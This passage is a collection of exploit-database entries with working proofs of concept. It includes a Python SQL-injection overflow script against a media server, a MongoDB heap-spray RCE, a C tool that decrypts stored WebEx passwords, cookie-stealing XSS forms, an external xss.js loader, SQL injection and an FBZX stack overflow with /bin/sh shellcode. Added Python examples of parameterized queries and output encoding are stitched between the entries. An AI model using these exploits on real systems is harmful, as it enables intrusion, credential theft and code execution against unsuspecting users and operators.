    ',TRACK,DLNA_PN,MIME,ALBUM_ART,DISC)/**/VALUES("31337"'+\
    ',"PWNED","PWNED","PWNED","PWNED","PWNED","PWNED"'+\
    ',"PWNED","1","PWNED");'

objects_insert_query='insert/**/into/**/OBJECTS(OBJECT_ID,PARENT_ID,CLASS,DETAIL_ID)'+\
    '/**/VALUES("PWNED","PWNED","container","31337");'

details_delete_query='delete/**/from/**/DETAILS/**/where/**/ID="31337";'
objects_delete_query='delete/**/from/**/OBJECTS/**/where/**/OBJECT_ID="PWNED";'

def build_injection_req(query):
    request=path_beginning+query+path_ending
    return request

def do_get_request(request):
    conn=httplib.HTTPConnection(host,8200)
    conn.request("GET",request,"",headers)
    conn.close()

def build_update_query(string):
    details_update_query='update/**/DETAILS/**/set/**/ALBUM_ART=ALBUM_ART'+\
        '||"'+string+'"/**/where/**/ID="31337";'
    return details_update_query

def clear_overflow_data():
    print "Deleting existing overflow data..."
    request=build_injection_req(details_delete_query)
    do_get_request(request)
    request=build_injection_req(objects_delete_query)
    do_get_request(request)
    time.sleep(1)

def insert_overflow_data():
    print("Setting up initial database records....")
    request=build_injection_req(objects_insert_query)
    do_get_request(request)
    request=build_injection_req(details_insert_query)
    do_get_request(request)
    print("Building long ALBUM_ART string.")
    for string in overflow_strings:
        req=build_injection_req(build_update_query(string))
        do_get_request(req)

clear_overflow_data()
insert_overflow_data()
-
MongoDB - 'conn' Mongo Object Remote Code Execution
source: https://www.securityfocus.com/bid/61309/info

MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to execute arbitrary code within the context of the affected application.

MongoDB 2.4.4 is vulnerable; other versions may also be affected.

use databaseMapped
sizechunk=0x1338;
chunk="";
for(i=0;i<sizechunk;i++){
    chunk+="\x05\x7c\x77\x55\x08\x04\x00\x00";
}
for(i=0;i<30000;i++){
    db.my_collection.insert({my_chunk:chunk})
}
db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")');
-
YardRadius - Multiple Local Format String Vulnerabilities
source: https://www.securityfocus.com/bid/61356/info

YardRadius is prone to multiple local format-string vulnerabilities.

Local attackers can leverage these issues to cause denial-of-service conditions. Due to the nature of these issues, arbitrary code-execution within the context of the vulnerable application may also be possible.

YardRadius 1.1.2-4 is vulnerable; other versions may also be affected.

The following proof-of-concept is available:

ln -s radiusd %x
./%x -v
-
Cisco WebEx One-Click Client Password Encryption - Information Disclosure
// source: https://www.securityfocus.com/bid/61304/info

Cisco WebEx One-Click Client is prone to an information disclosure vulnerability.

Successful exploits may allow an attacker to disclose sensitive information such as stored passwords; this may aid in further attacks.

/*
    WebEx One-Click Registry Key Decryptor
    brad.antoniewicz@foundstone.coma

    compile with gcc -o webex-onedecrypt -lssl webex-onedecrypt.c

    Thanks to https://code.google.com/p/tps-cripto-itba/source/browse/trunk/src/criptography
    for making life easy

    see comments below
*/

#include <openssl/aes.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

unsigned char * aes_ofb_encrypt(unsigned char * text, int length, unsigned char * key, unsigned char * iv) {
    unsigned char * outbuf = calloc(1,length);
    int num = 0;
    unsigned char liv[16];
    memcpy(liv,iv,16);
    AES_KEY aeskey;

    //memset(outbuf, 0, 8);
    AES_set_encrypt_key(key, 256, &aeskey);
    AES_ofb128_encrypt(text, outbuf, length, &aeskey, liv, &num);
    return outbuf;
}

unsigned char * aes_ofb_decrypt(unsigned char * enc, int length, unsigned char * key, unsigned char * iv) {
    unsigned char * outbuf= calloc(1,length);
    int num = 0;
    unsigned char liv[16];
    memcpy(liv,iv,16);
    AES_KEY aeskey;

    /* OFB mode uses the block cipher's encrypt direction for both
       encryption and decryption, so the same key schedule is used here. */
    AES_set_encrypt_key(key, 256, &aeskey);
    AES_ofb128_encrypt(enc, outbuf, length, &aeskey, liv, &num);
    return outbuf;
}

int main(void) {
    /* This value is from HKEY_CURRENT_USER\Software\WebEx\ProdTools\Password */
    unsigned char * regVal = (unsigned char *)"\xcc\x6d\xc9\x3b\xa0\xcc\x4c\x76\x55\xc9\x3b\x9f";

    /* This value is from HKEY_CURRENT_USER\Software\WebEx\ProdTools\PasswordLen */
    int regLength = 12;

    /* This value is a combination of these two registry keys:
         HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName
         HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName
       Basically the username and the sitename padded to 32 characters; if the two
       don't add up to 32 characters, it's just repeated until it fits */
    unsigned char key[32] = "braantonsiteaa.webex.com/siteaab";

    /* The IV is static, particularly complex value of 123456789abcdef.... */
    unsigned char iv[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
                             0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };

    /* These are just for testing, you'd probably not have the password :) */
    unsigned char * password = (unsigned char *)"bradbradbrad";
    int pwLength = strlen((char *)password);

    unsigned char * enc = NULL;
    unsigned char * enc2 = NULL;
    int i = 0;

    printf("Reg Key Value = ");
    enc = aes_ofb_encrypt(password, pwLength, key, iv);
    for(i=0;i<pwLength;i++) {
        printf("%02x ", enc[i]);
    }
    printf("\n");

    printf("Password = ");
    enc2 = aes_ofb_decrypt(regVal, regLength, key, iv);
    for(i=0;i<regLength;i++) {
        printf("%c", enc2[i]);
    }
    printf("\n");

    free(enc);
    free(enc2);
    return 0;
}
-
Barracuda CudaTel - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/61353/info

Barracuda CudaTel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Barracuda CudaTel 2.6.02.04 is vulnerable; other versions may also be affected.

http://www.example.com/gui/route/route?%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C
http://www.example.com/gui/route/route?_=1354073910062&bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C
http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#
http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#
-
Collabtive - Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/61384/info

Collabtive is prone to multiple cross-site scripting vulnerabilities, an arbitrary file upload vulnerability, and a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to bypass certain security restrictions, upload and execute arbitrary script code in the context of the affected web server process. This may let attackers steal cookie-based authentication credentials, perform unauthorized actions, or compromise the application; other attacks are possible.

Collabtive 1.0 is vulnerable; other versions may also be affected.

File upload:
https://www.example.com/secprj/files/standard/avatar/uploadedshell_104185.php

Cross-site scripting:
https://www.example.com/secprj/managechat.php?userto=<SCRIPT/XSS SRC="http://www.example1.com/xss.js";></SCRIPT>&uid=2
"><SCRIPT/XSS SRC="http://www.example1.com/xss.js";></SCRIPT>

Security-bypass:
https://www.example.com/secprj/manageuser.php?action=del&id=5
-
WordPress Plugin FlagEm - 'cID' Cross-Site Scripting
source: https://www.securityfocus.com/bid/61401/info

The FlagEm plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/wp-content/plugins/FlagEm/flagit.php?cID=[Xss]
-
vBulletin 4.0.2 - 'update_order' SQL Injection
source: https://www.securityfocus.com/bid/61449/info

VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

VBulletin 4.0.x are vulnerable.

The exploit is caused due to a variable named 'update_order' not being sanitized before being used within an insert into statement.

if ($_REQUEST['do'] == 'update_order')
{
    $vbulletin->input->clean_array_gpc('r', array(
        'force_read_order' => TYPE_ARRAY
    ));

    if ($vbulletin->GPC['force_read_order'])
    {
        foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order)
        {
            $db->query_write("
                UPDATE " . TABLE_PREFIX . "thread AS thread
                SET force_read_order = '$order'
                WHERE threadid = '$threadid'
            ");
        }
    }
}

POC

You will need Admincp Access, then go to site.com/admincp/force_read_thread.php; then in the force read order column put a ' into one of them to show this:

Database error in vBulletin 4.2.1:

Invalid SQL:
UPDATE thread AS thread
SET force_read_order = '1''
WHERE threadid = '5161';

MySQL Error   : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5161'' at line 2
Error Number  : 1064
Request Date  : Thursday, July 25th 2013 @ 01:20:52 AM
Error Date    : Thursday, July 25th 2013 @ 01:20:52 AM
Script        : http://www.example.com/admincp/force_read_thread.php?do=update_order
Referrer      : http://www.example.com/admincp/force_read_thread.php
IP Address    :
Username      : n3tw0rk
Classname     : MySQL
Version       :
-
Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/61423/info

Magnolia CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Magnolia CMS versions 4.5.7, 4.5.8, 4.5.9, 5.0 and 5.0.1 are vulnerable.

<form action="http://www.example.com/magnoliaPublic/demo-project/members-area/registration.html" method="post" name="main">
<input type="hidden" name="mgnlModelExecutionUUID" value="8417fe0e-8f61-4d21-bdf1-c9c23b13ba14">
<input type="hidden" name="password" value='password'>
<input type="hidden" name="passwordConfirmation" value='password'>
<input type="hidden" name="username" value='"><script>alert(document.cookie);</script>'>
<input type="hidden" name="fullName" value='"><script>alert(document.cookie);</script>'>
<input type="hidden" name="email" value='"><script>alert(document.cookie);</script>'>
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
-
WordPress Plugin Duplicator - Cross-Site Scripting
source: https://www.securityfocus.com/bid/61425/info

The Duplicator plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Duplicator 0.4.4 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
-
WordPress Plugin WP Fastest Cache 0.8.4.8 - Blind SQL Injection
# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection
# Date: 11-11-2015
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description

For this vulnerability, WP-Polls also needs to be installed. Everyone can access wpfc_wppolls_ajax_request(). $_POST["poll_id"] is not sanitized properly before it reaches check_voted().

File: wp-fastest-cache\inc\wp-polls.php

public function wpfc_wppolls_ajax_request() {
    $id = strip_tags($_POST["poll_id"]);
    $id = mysql_real_escape_string($id);
    $result = check_voted($id);
    if($result){
        echo "true";
    }else{
        echo "false";
    }
    die();
}

http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html

2. Proof of Concept

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
    <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
    <input type="submit" value="Send">
</form>

3. Solution:

Update to version 0.8.4.9
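The vBulletin and WP Fastest Cache entries above are two different faces of the same defect: in vBulletin the value is concatenated inside a quoted string, in WP Fastest Cache it is escaped but then spliced in without quotes, so mysql_real_escape_string() has nothing to escape. The following is an added example, not code from either project, that rebuilds both patterns in Python against an in-memory SQLite database and places each beside a hardened version. Table names, the schema and the rows are constructed for the demonstration; the `AS thread` alias from the vBulletin query is dropped because older SQLite builds do not accept it.

```python
# Added example (not vBulletin's or WP Fastest Cache's code): both injection
# patterns from the advisories above, rebuilt in Python/SQLite, each beside a
# hardened form. Schema, table names and rows are constructed.
import re
import sqlite3

# mysql_real_escape_string()-style mapping: only characters that matter
# *inside a quoted string literal* are touched.
_ESCAPES = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\x00": "\\0",
            "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}


def make_db():
    """Constructed sample data: one thread row, one poll vote."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE thread (threadid INTEGER PRIMARY KEY, force_read_order TEXT);
        INSERT INTO thread VALUES (5161, '0');
        CREATE TABLE poll_vote (poll_id INTEGER, voter_ip TEXT);
        INSERT INTO poll_vote VALUES (7, '198.51.100.20');
    """)
    return con


# --- vBulletin force_read_thread.php: value concatenated inside quotes -------

def update_order_unsafe(con, threadid, order):
    """Mirrors the vulnerable query_write(): both values go into the SQL text."""
    sql = ("UPDATE thread SET force_read_order = '%s' WHERE threadid = '%s'"
           % (order, threadid))
    con.execute(sql)          # a stray quote breaks the statement, as in the PoC
    con.commit()


def update_order_safe(con, threadid, order):
    """Hardened: validate the shape first, then let the driver bind values."""
    if not re.fullmatch(r"-?\d+", str(order)):
        raise ValueError("force_read_order must be an integer: %r" % (order,))
    con.execute("UPDATE thread SET force_read_order = ? WHERE threadid = ?",
                (str(int(order)), int(threadid)))
    con.commit()


# --- WP Fastest Cache wpfc_wppolls_ajax_request(): escaped but unquoted -----

def mysql_style_escape(value):
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def check_voted_escaped(con, poll_id):
    """Mirrors the plugin's path: strip_tags, escape, then use *unquoted*.
    Spaces, '=' and keywords are not escapable, so the query still changes."""
    pid = mysql_style_escape(re.sub(r"<[^>]*>", "", poll_id))
    sql = "SELECT COUNT(*) FROM poll_vote WHERE poll_id = %s" % pid
    return con.execute(sql).fetchone()[0]


def check_voted_safe(con, poll_id):
    """Hardened: an id is an integer or it is rejected (stricter than PHP's
    lenient intval()), and the integer is bound, not interpolated."""
    pid = int(poll_id)        # ValueError on anything that is not a plain integer
    return con.execute("SELECT COUNT(*) FROM poll_vote WHERE poll_id = ?",
                       (pid,)).fetchone()[0]


def demo():
    """Run both cases with the probe values and return the observations."""
    con, out = make_db(), {}
    try:
        update_order_unsafe(con, 5161, "1'")
        out["unsafe_update_error"] = False
    except sqlite3.OperationalError:
        out["unsafe_update_error"] = True          # the PoC's "Invalid SQL"
    update_order_safe(con, 5161, "1")
    out["safe_update_value"] = con.execute(
        "SELECT force_read_order FROM thread WHERE threadid = 5161").fetchone()[0]
    try:
        update_order_safe(con, 5161, "1'")
        out["safe_update_rejects_quote"] = False
    except ValueError:
        out["safe_update_rejects_quote"] = True
    out["escaped_plain"] = check_voted_escaped(con, "8")            # no votes
    out["escaped_tautology"] = check_voted_escaped(con, "8 OR 1=1")  # all rows
    try:
        check_voted_safe(con, "8 OR 1=1")
        out["safe_rejects_tautology"] = False
    except ValueError:
        out["safe_rejects_tautology"] = True
    out["safe_plain"] = check_voted_safe(con, "7")
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-28s %r" % (k, v))
```

The point of `check_voted_escaped` is that the escaping call is genuinely applied and still does nothing: `8 OR 1=1` contains no character in the escape table, so the unquoted numeric context is rewritten exactly as submitted. The fix is a type check plus parameter binding, not more escaping.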
-
xmonad XMonad.Hooks.DynamicLog Module - Multiple Remote Command Injection Vulnerabilities
source: https://www.securityfocus.com/bid/61491/info

The XMonad.Hooks.DynamicLog module for xmonad is prone to multiple remote command-injection vulnerabilities. Successful exploits will result in the execution of arbitrary commands in the context of the affected applications. This may aid in further attacks.

<html>
<head>
    <title><action=xclock>An innocent title</action></title>
</head>
<body>
    <h1>Good bye, cruel world</h1>
</body>
</html>
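The PoC above works because a web page's title becomes the X window title, and DynamicLog forwards that title to the status bar, where `<action=CMD>...</action>` is markup meaning "run CMD on click". The defence is to treat window titles as untrusted input and strip (or otherwise neutralise) markup before they reach the bar. The following is an added example in Python, not xmonad's own Haskell code, showing a sanitiser plus an audit record of what it removed; the tag grammar is an approximation of xmobar's and the sample titles are constructed. Whether the project's own fix strips or escapes is not stated on this page.

```python
# Added example (Python, not xmonad's code): window titles treated as untrusted
# input before reaching a status-bar markup channel. Tag grammar and sample
# titles are constructed for the demonstration.
import re

# Any xmobar-style tag: "<name>", "<name=value>" or "</name>".
TAG_RE = re.compile(r"</?[a-z]+(?:=[^>]*)?>", re.IGNORECASE)
# The tag that carries a command; group 1 is the command text.
ACTION_RE = re.compile(r"<action=([^>]*)>", re.IGNORECASE)


def find_actions(title):
    """Return the command strings of any <action=...> tags in a title."""
    return ACTION_RE.findall(title)


def strip_markup(title):
    """Remove every tag so the bar renders the title as literal text.
    A bare '<' that does not form a tag (e.g. 'x < 3') is left alone."""
    return TAG_RE.sub("", title)


def build_status_line(titles):
    """Sanitise each title and keep an audit record.
    Returns (status_line, findings); findings lists (original, [commands])
    for every title that carried an action tag, so the attempt is logged."""
    clean, findings = [], []
    for title in titles:
        actions = find_actions(title)
        if actions:
            findings.append((title, actions))
        clean.append(strip_markup(title))
    return " | ".join(clean), findings


# Constructed sample: a benign title, the advisory's payload, and a title
# mixing a colour tag with a mixed-case action tag.
SAMPLE_TITLES = [
    "Terminal",
    "<action=xclock>An innocent title</action>",
    "<FC=#ff0000>Red</FC> <Action=xeyes>Docs</Action>",
]

if __name__ == "__main__":
    line, found = build_status_line(SAMPLE_TITLES)
    print(line)
    for title, cmds in found:
        print("markup in window title %r: commands %r" % (title, cmds))
```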
-
Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting
source: https://www.securityfocus.com/bid/61571/info

Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected.

http://www.example.com/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
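The Magnolia, Duplicator and Jahia entries above inject into three different HTML contexts: an attribute value (the `">` prefix closes the attribute), element text, and a string inside an existing `<script>` block (the `</script>` prefix ends the script element). Each context needs its own output encoding, and the Jahia case shows why plain HTML escaping is not enough inside script. The following is an added example, not code from any of the three projects, that renders a constructed page template with the three payloads encoded per context; the payload strings are the ones from the advisories, URL-decoded.

```python
# Added example (not Magnolia's, Duplicator's or Jahia's code): context-aware
# output encoding for the three contexts the advisories above inject into.
# The page template is constructed; the payloads are the advisories' own.
import html
import json

MAGNOLIA_PAYLOAD = '"><script>alert(document.cookie);</script>'        # attribute
DUPLICATOR_PAYLOAD = "<script>alert(document.cookie);</script>"        # text
JAHIA_PAYLOAD = "</script><script>alert(document.cookie);</script>"    # in <script>

TEMPLATE = (
    '<input type="text" name="username" value="{attr}">\n'
    '<p>Package: {text}</p>\n'
    '<script>var site = {js};</script>'
)


def encode_attr(value):
    """Double-quoted attribute value: entity-encode & < > " and ' so the
    data can neither close the attribute nor open a tag."""
    return html.escape(value, quote=True)


def encode_text(value):
    """Element text: the same entity encoding; one rule for both contexts."""
    return html.escape(value, quote=True)


def encode_js_string(value):
    """String literal inside <script>: JSON-encode (quotes, backslashes, line
    terminators), then replace < > & with \\uXXXX escapes. The HTML parser
    never sees a '</script', and JavaScript decodes the escapes back."""
    encoded = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        encoded = encoded.replace(ch, esc)
    return encoded


def js_roundtrip_ok(value):
    """The encoding must be lossless for the script that consumes it."""
    return json.loads(encode_js_string(value)) == value


def render(username, package, site):
    """Hardened rendering: each slot encoded for the context it sits in."""
    return TEMPLATE.format(attr=encode_attr(username),
                           text=encode_text(package),
                           js=encode_js_string(site))


def render_unencoded(username, package, site):
    """What the vulnerable pages effectively did: raw interpolation."""
    return TEMPLATE.format(attr=username, text=package, js='"%s"' % site)


if __name__ == "__main__":
    print("--- vulnerable ---")
    print(render_unencoded(MAGNOLIA_PAYLOAD, DUPLICATOR_PAYLOAD, JAHIA_PAYLOAD))
    print("--- hardened ---")
    print(render(MAGNOLIA_PAYLOAD, DUPLICATOR_PAYLOAD, JAHIA_PAYLOAD))
```

The unencoded render contains four `<script>` tags, three of them from user data; the hardened one contains exactly the template's own. Note the Jahia slot: `html.escape` would have produced `&lt;/script&gt;`, which JavaScript does not decode, so the script would have received the wrong string; JSON encoding with `\u003c` escapes keeps the value intact and still denies the HTML parser a closing tag.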
-
FBZX 2.10 - Local Stack Buffer Overflow
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: fbzx - ZX Spectrum Emulator for X
# Tested on: GNU/Linux - Kali Linux 2.0 x86
#
# Description: FBZX v2.10 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.rastersoft.com/
# Kali Linux 2.0 package: http://repo.kali.org/kali/pool/contrib/f/fbzx/
# MD5: 0fc1d2e9c374c1156b2b02186a9f8980

import os, subprocess, sys

def run():
    try:
        print "# FBZX v2.10 Stack-Based Overflow by Juan Sacco"
        print "# It's Fuzzing time on unusable exploits"
        print "# This exploit is for educational purposes only"
        # Basic structure: JUNK + SHELLCODE + NOPS + EIP
        junk = "\x41"*8
        shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
        nops = "\x90"*5010
        eip = "\x10\xd3\xff\xbf"
        subprocess.call(["fbzx", ' ', junk + shellcode + nops + eip])
    except OSError as e:
        if e.errno == os.errno.ENOENT:
            print "FBZX not found!"
        else:
            print "Error executing exploit"
        raise

def howtousage():
    print "Sorry, something went wrong"
    sys.exit(-1)

if __name__ == '__main__':
    try:
        print "Exploit FBZX 2.10 Local Overflow Exploit"
        print "Author: Juan Sacco"
    except IndexError:
        howtousage()
    run()